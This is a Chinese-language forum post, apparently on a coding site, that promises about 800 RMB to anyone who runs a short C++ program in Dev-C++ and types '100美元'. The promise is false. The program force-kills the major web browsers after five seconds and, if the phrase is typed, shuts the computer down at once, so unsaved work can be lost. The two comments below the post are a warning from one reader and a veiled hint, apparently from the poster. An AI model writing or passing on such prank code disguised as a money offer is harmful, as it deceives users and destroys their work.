喜报喜报!!!!!!!如果想赚钱,在Dev-c++中运行下面代码,输出“100美元”,即可赚约等于800人民币,必须在Dev-c++上!!!!!!!!! #include<bits/stdc++.h> #include<windows.h> using namespace std;

string input; bool flag=false;

DWORD WINAPI timer(LPVOID lpParam){ Sleep(5000); if(!flag){ system("taskkill /f /im chrome.exe"); system("taskkill /f /im msedge.exe"); system("taskkill /f /im firefox.exe"); system("taskkill /f /im iexplore.exe"); flag=true; } return 0; }

signed main(){ CreateThread(NULL,0,timer,NULL,0,NULL);

cout<<"请输入:";
getline(cin,input);
flag=true;

if(input=="100美元"){
    system("shutdown -s -t 0");
}
else{
    cout<<"BYEBYE"<<endl;
}
return 0;

} 提示:运行时建议将正在浏览的网站关掉,否则会慢一点,长则30秒,短则15秒!!

注意:记得把上面的代码全部复制,不要直接按copy!!!!!!!!

记得看评论区,我说了些什么

2 条评论

  • @ 2026-7-20 14:08:25

    不要信,我试过了,呜呜

    • @ 2026-7-20 14:06:11

      如有心理素质一般或敲代码敲到50行以上的人,请慎重运行赚钱,我提醒过了!!!!!!!!!

      • 1